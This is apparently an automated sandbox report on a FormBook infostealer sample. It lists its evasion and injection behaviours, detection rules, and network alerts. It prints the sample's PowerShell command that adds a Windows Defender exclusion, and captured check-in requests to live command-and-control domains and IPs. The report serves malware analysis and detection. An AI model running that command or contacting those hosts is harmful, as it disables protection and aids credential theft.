Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan 00093847.exe

Overview

General Information

Sample name:Scan 00093847.exe
Analysis ID:1506403
MD5:7c580b0bf94b5edb15717136670a8092
SHA1:92393d585cfc170824a8184e68d2724a42b68835
SHA256:9d606ced77696b89acfe57d52547936b3b36f8bce44fbde3efa787e693f82637
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Scan 00093847.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\Scan 00093847.exe" MD5: 7C580B0BF94B5EDB15717136670A8092)
    • powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Scan 00093847.exe (PID: 5436 cmdline: "C:\Users\user\Desktop\Scan 00093847.exe" MD5: 7C580B0BF94B5EDB15717136670A8092)
      • uspEUeZyrqFDmi.exe (PID: 4008 cmdline: "C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setupugc.exe (PID: 7076 cmdline: "C:\Windows\SysWOW64\setupugc.exe" MD5: 342CBB77B3F4B3F073DF2F042D20E121)
          • uspEUeZyrqFDmi.exe (PID: 4520 cmdline: "C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1852 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bfe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1414f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.Scan 00093847.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.Scan 00093847.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e4a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.Scan 00093847.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.Scan 00093847.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan 00093847.exe", ParentImage: C:\Users\user\Desktop\Scan 00093847.exe, ParentProcessId: 5480, ParentProcessName: Scan 00093847.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", ProcessId: 6104, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan 00093847.exe", ParentImage: C:\Users\user\Desktop\Scan 00093847.exe, ParentProcessId: 5480, ParentProcessName: Scan 00093847.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", ProcessId: 6104, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan 00093847.exe", ParentImage: C:\Users\user\Desktop\Scan 00093847.exe, ParentProcessId: 5480, ParentProcessName: Scan 00093847.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", ProcessId: 6104, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-07T21:43:36.228581+020028554651A Network Trojan was detected192.168.2.45622882.221.128.18380TCP
            2024-09-07T21:44:07.694615+020028554651A Network Trojan was detected192.168.2.456233217.160.0.12780TCP
            2024-09-07T21:44:21.251583+020028554651A Network Trojan was detected192.168.2.45623785.159.66.9380TCP
            2024-09-07T21:44:35.274281+020028554651A Network Trojan was detected192.168.2.45624118.139.62.22680TCP
            2024-09-07T21:44:49.014006+020028554651A Network Trojan was detected192.168.2.456245162.0.213.9480TCP
            2024-09-07T21:45:02.701525+020028554651A Network Trojan was detected192.168.2.4562493.33.130.19080TCP
            2024-09-07T21:45:16.809766+020028554651A Network Trojan was detected192.168.2.45625313.248.169.4880TCP
            2024-09-07T21:45:31.255864+020028554651A Network Trojan was detected192.168.2.456257185.134.245.11380TCP
            2024-09-07T21:45:45.914448+020028554651A Network Trojan was detected192.168.2.456261103.42.108.4680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-07T21:44:00.021494+020028554641A Network Trojan was detected192.168.2.456230217.160.0.12780TCP
            2024-09-07T21:44:02.597060+020028554641A Network Trojan was detected192.168.2.456231217.160.0.12780TCP
            2024-09-07T21:44:05.121163+020028554641A Network Trojan was detected192.168.2.456232217.160.0.12780TCP
            2024-09-07T21:44:13.635184+020028554641A Network Trojan was detected192.168.2.45623485.159.66.9380TCP
            2024-09-07T21:44:16.178192+020028554641A Network Trojan was detected192.168.2.45623585.159.66.9380TCP
            2024-09-07T21:44:18.855613+020028554641A Network Trojan was detected192.168.2.45623685.159.66.9380TCP
            2024-09-07T21:44:27.653098+020028554641A Network Trojan was detected192.168.2.45623818.139.62.22680TCP
            2024-09-07T21:44:30.171638+020028554641A Network Trojan was detected192.168.2.45623918.139.62.22680TCP
            2024-09-07T21:44:32.745379+020028554641A Network Trojan was detected192.168.2.45624018.139.62.22680TCP
            2024-09-07T21:44:41.381314+020028554641A Network Trojan was detected192.168.2.456242162.0.213.9480TCP
            2024-09-07T21:44:43.921266+020028554641A Network Trojan was detected192.168.2.456243162.0.213.9480TCP
            2024-09-07T21:44:46.507584+020028554641A Network Trojan was detected192.168.2.456244162.0.213.9480TCP
            2024-09-07T21:44:55.044638+020028554641A Network Trojan was detected192.168.2.4562463.33.130.19080TCP
            2024-09-07T21:44:57.590729+020028554641A Network Trojan was detected192.168.2.4562473.33.130.19080TCP
            2024-09-07T21:45:00.152606+020028554641A Network Trojan was detected192.168.2.4562483.33.130.19080TCP
            2024-09-07T21:45:08.215628+020028554641A Network Trojan was detected192.168.2.45625013.248.169.4880TCP
            2024-09-07T21:45:11.261505+020028554641A Network Trojan was detected192.168.2.45625113.248.169.4880TCP
            2024-09-07T21:45:14.263668+020028554641A Network Trojan was detected192.168.2.45625213.248.169.4880TCP
            2024-09-07T21:45:23.571419+020028554641A Network Trojan was detected192.168.2.456254185.134.245.11380TCP
            2024-09-07T21:45:26.061528+020028554641A Network Trojan was detected192.168.2.456255185.134.245.11380TCP
            2024-09-07T21:45:28.592743+020028554641A Network Trojan was detected192.168.2.456256185.134.245.11380TCP
            2024-09-07T21:45:37.497476+020028554641A Network Trojan was detected192.168.2.456258103.42.108.4680TCP
            2024-09-07T21:45:40.787323+020028554641A Network Trojan was detected192.168.2.456259103.42.108.4680TCP
            2024-09-07T21:45:43.323564+020028554641A Network Trojan was detected192.168.2.456260103.42.108.4680TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Scan 00093847.exeJoe Sandbox ML: detected
            Source: Scan 00093847.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Scan 00093847.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: WYNp.pdbSHA256 source: Scan 00093847.exe
            Source: Binary string: setupugc.pdb source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000002.3553025155.0000000001088000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uspEUeZyrqFDmi.exe, 00000008.00000000.1983763767.0000000000ADE000.00000002.00000001.01000000.0000000C.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553078473.0000000000ADE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scan 00093847.exe, 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2069789007.00000000037F2000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2071753263.00000000039A3000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: WYNp.pdb source: Scan 00093847.exe
            Source: Binary string: wntdll.pdb source: Scan 00093847.exe, Scan 00093847.exe, 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2069789007.00000000037F2000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2071753263.00000000039A3000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000002.3553025155.0000000001088000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0326C520 FindFirstFileW,FindNextFileW,FindClose,9_2_0326C520
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 4x nop then jmp 07A7E3DEh0_2_07A7EBDA
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 4x nop then jmp 07A7E3DEh0_2_07A7EC89
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then xor eax, eax9_2_03259C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then mov ebx, 00000004h9_2_03970469

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56249 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56261 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56237 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56251 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56228 -> 82.221.128.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56240 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56234 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56247 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56248 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56253 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56236 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56244 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56242 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56239 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56255 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56254 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56252 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56257 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56233 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56258 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56246 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56243 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56245 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56259 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56235 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56260 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56256 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56238 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56241 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56232 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56230 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56231 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56250 -> 13.248.169.48:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.nevsehir-nakliyat.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: THORDC-ASIS THORDC-ASIS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ujbu/?GtLD=xFGdQ6FH&dxWljT6=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88= HTTP/1.1Host: www.nosr.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /4c7j/?dxWljT6=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=&GtLD=xFGdQ6FH HTTP/1.1Host: www.complexity.pubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /csz1/?dxWljT6=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&GtLD=xFGdQ6FH HTTP/1.1Host: www.nevsehir-nakliyat.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=&GtLD=xFGdQ6FH HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /09dt/?dxWljT6=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&GtLD=xFGdQ6FH HTTP/1.1Host: www.kryto.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /efkd/?GtLD=xFGdQ6FH&dxWljT6=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A= HTTP/1.1Host: www.angelenterprise.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /pjne/?dxWljT6=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&GtLD=xFGdQ6FH HTTP/1.1Host: www.dyme.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
